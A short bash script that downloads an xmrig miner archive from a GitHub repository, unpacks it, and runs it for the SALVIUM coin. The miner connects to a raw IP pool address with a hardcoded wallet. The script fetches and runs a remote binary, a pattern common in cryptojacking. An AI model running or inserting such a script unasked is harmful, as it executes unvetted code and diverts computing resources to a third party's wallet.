#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig coin=SALVIUM --donate-level 1 -o 188.166.186.218:443 -u 8C1XJfJa99w9wDpcEjKxBSh1LmPjpBhRvjVizaiu4xzSS3JUGQASFqk95L4LLXWnAuWUp7VowDGh3cvhaUFREhEgCDWbnMD -p b -a rx/0
